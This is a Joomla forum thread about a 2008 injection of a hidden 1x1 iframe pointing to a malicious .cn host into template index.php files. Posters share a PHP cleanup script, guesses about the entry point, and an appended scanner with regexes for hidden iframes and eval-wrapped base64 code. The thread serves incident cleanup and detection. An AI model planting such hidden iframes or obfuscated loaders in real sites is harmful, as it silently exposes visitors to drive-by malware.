Code Injection in the index.php

Discussion regarding Joomla! security issues.

metemelek
Joomla! Fledgling
Posts: 2
Joined: Fri Jul 14, 2006 12:59 pm

Code Injection in the index.php

Post by metemelek » Mon Oct 13, 2008 12:55 pm

Hi Folks

Today I have seen this code after the <body> tags "<iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe>" in the files of

Public_html/index.php
Public_html/templates/all of templates/index.php
Public_html/administrator/index.php
Public_html/administrator/templates/joomla_admin/index.php

How did they inject it? Have you ever seen such malware code? Is there anyone who can help me with this trouble?

Have a nice day.

dhuelsmann
Joomla! Master
Posts: 19659
Joined: Sun Oct 02, 2005 12:50 am
Location: Omaha, NE

Re: Code Injection in the index.php

Post by dhuelsmann » Mon Oct 13, 2008 1:37 pm

Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org

leroy
Joomla! Apprentice
Posts: 31
Joined: Fri Dec 23, 2005 1:30 am

Re: Code Injection in the index.php

Post by leroy » Mon Oct 27, 2008 2:26 pm

There is a major hack going down, inserting code snippets into the Joomla template index files. All my sites have been compromised, first time in 4 years.

The code snip I am finding is the hu1-hu1.cn hack. I think they are getting in through the php engine. Bad.

stackedsax
Joomla! Intern
Posts: 57
Joined: Thu Mar 02, 2006 8:09 am

Re: Code Injection in the index.php

Post by stackedsax » Mon Oct 27, 2008 9:10 pm

I have run into the same thing. Anyone figured out how they're doing it yet? I'm working on just removing the crap from my php, html and htm files. Will let you know if I find a pleasant way of doing it without disturbing all the files too much.

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Code Injection in the index.php

Post by mandville » Tue Oct 28, 2008 9:31 pm

Here is my thinking on how I would do it:
.try and POST to the 777 permissions template folder a pre-injected version of the template
.move on to the next place.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

stackedsax
Joomla! Intern
Posts: 57
Joined: Thu Mar 02, 2006 8:09 am

Re: Code Injection in the index.php

Post by stackedsax » Tue Nov 04, 2008 12:49 pm

Sorry, I'd fixed my stuff but hadn't given back.

Here's some code I sniped from another forum and then modified to suit me.

Code:

<?php
// 23/8/2008 <unknown name yet> exploit clean
// Written by [email protected] and modified to please stackedsax

// Get all files under the 'public_html' directory -- change accordingly
$command = shell_exec('find public_html -iname "*.php" -o -iname "*.html" -o -iname "*.htm" -o -iname "*.tpl"');
$lines = explode("\n", (string) $command);
array_pop($lines); //Just to get rid of the final \n...

foreach($lines as $line)
{

  // Get current contents of file; skip anything that cannot be read
  $contents = file_get_contents($line);
  if ($contents === false) {
    continue;
  }

  // Clean exploit code
  //  print "Cleaning file: $line\n";
  $pattern = '|<html> <body><script>var source ="=jgs.*\ndocument.write.*</script>\s*\n\s*</html> </body>|ms';
  $clean_contents = preg_replace($pattern, '', $contents);
  if ($clean_contents === null) {
    // preg_replace failed (e.g. backtrack limit hit); leave the file
    // untouched instead of overwriting it with an empty string
    continue;
  }
  $clean_contents = str_replace("</html>  </body>", "</html>", $clean_contents);

  // Write cleaned contents, only if something actually changed
  if ($clean_contents !== $contents) {
    $file = fopen($line, 'w'); // mode must be a quoted string
    fwrite($file, $clean_contents);
    fclose($file);
  }

}

?>

Save the code as a php file like 'cleanThatCrap.php' and run at the command line:

Code:

> php cleanThatCrap.php

Of course, you should back up your hacked files before you blindly run my code....

I think I could have done it a line or two quicker, but by the time I thought about it, I'd cleaned my files, so I never got to refining it any further. For instance, I think the only replacement you need is actually something more like:

Code:

  $pattern = '|<html> <body><script>var source ="=jgs.*</body>|ms';

I was just being overly specific and as a consequence need a str_replace in there too...

Whatever works for you guys.

leroy
Joomla! Apprentice
Posts: 31
Joined: Fri Dec 23, 2005 1:30 am

Re: Code Injection in the index.php

Post by leroy » Tue Nov 04, 2008 9:20 pm

It appears that the code snippet was part of a much more sophisticated exploit that infected many servers from the server farm I lease from, and has nothing specifically to do with Joomla. I believe the compromise was at the administrative level of the server farm; they may have got the root passwords. I don't think there was any way to defend against it on the code level.

I was able to clean up about 40,000 files on my server with a combination of scripts and PowerGREP. I described the problem to one of my consultants and he immediately knew the server farm name without my telling him, so that was the smoking gun. When I finally got the farm techs to fill me in on the scale of the compromise, it was clear that just cleaning the snippets was the least of my problems. The list of exploits was pages long and quite sophisticated. The server was so fully compromised that I would never be confident of it again. So I bit the bullet and reloaded the server, doing 2 years of work in 48 hours. Having the old drive slaved to the new one helped; I will reformat as soon as possible.

stackedsax
Joomla! Intern
Posts: 57
Joined: Thu Mar 02, 2006 8:09 am

Re: Code Injection in the index.php

Post by stackedsax » Wed Nov 05, 2008 2:57 am

Yes, you are correct, from what I've read elsewhere, people were claiming that this was part of a root attack. The code I posted is only to clean the affected files so that your websites might work.

In the meantime, other evasive action is certainly required... backup, move to a more hardened server, change passwords.... all the usual.

vikki237
Joomla! Fledgling
Posts: 2
Joined: Thu Mar 26, 2009 8:05 am

Re: Code Injection in the index.php

Post by vikki237 » Sun May 24, 2009 5:33 pm

Just change the permissions of the file .htaccess to read only, and also of the front index.php + index.html files to read only.....

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Code Injection in the index.php

Post by mandville » Sun May 24, 2009 9:02 pm

vikki237 wrote: just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....

Without knowing what actually happened, this information is a bit too vague.

tamilmaran
Joomla! Apprentice
Posts: 28
Joined: Fri Jan 11, 2008 7:25 am
Location: Tamilnadu,India

Re: Code Injection in the index.php

Post by tamilmaran » Mon Oct 29, 2012 9:01 am

I host my site on a hosting server, so shell access is not possible. Is it possible to run recursively on all folders' PHP files and clean some base64 code injection from my PHP files?
Help me
Thanks in advance
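
On a host without shell access, the recursive walk asked about in the last post can be done with PHP's own directory iterators instead of `find`. The following is an added example, not code from any poster in this thread: it only reports files (it does not rewrite them) that contain a hidden or 1x1 iframe like the one quoted in the first post or an eval-wrapped base64_decode call, and it flags world-writable files. The signature names, the regexes and the function names scanFile and scanTree are assumptions.

```php
<?php
// Added example, not from the thread. Signature regexes are assumptions modelled on the snippets quoted above.
const SIGNATURES = [
    // iframe with width 0/1 or hidden via CSS, as in the first post
    'hidden_iframe' => '/<iframe\b[^>]*(?:width\s*=\s*["\']?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>/i',
    // eval wrapped around base64_decode, optionally via gzinflate/str_rot13
    'eval_base64'   => '/\beval\s*\((?:\s|\(|gzinflate|gzuncompress|str_rot13)*base64_decode\s*\(/i',
];
const EXTENSIONS = ['php', 'html', 'htm', 'tpl'];

function scanFile(string $path): array
{
    $contents = @file_get_contents($path);
    if ($contents === false) {
        return ['unreadable'];
    }
    $hits = [];
    foreach (SIGNATURES as $name => $regex) {
        if (preg_match($regex, $contents) === 1) {
            $hits[] = $name;
        }
    }
    if ((fileperms($path) & 0002) !== 0) { // world-writable (the "777" case)
        $hits[] = 'world_writable';
    }
    return $hits;
}

function scanTree(string $root): array
{
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || !in_array(strtolower($file->getExtension()), EXTENSIONS, true)) {
            continue;
        }
        $hits = scanFile($file->getPathname());
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

header('Content-Type: text/plain');
foreach (scanTree(__DIR__) as $path => $hits) {
    echo $path, ': ', implode(', ', $hits), "\n";
}
```

Placed in the site root and requested once, it lists each flagged file with the reasons; flagged files can then be compared against a known-clean copy of the same Joomla release, and the script removed from the server afterwards.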

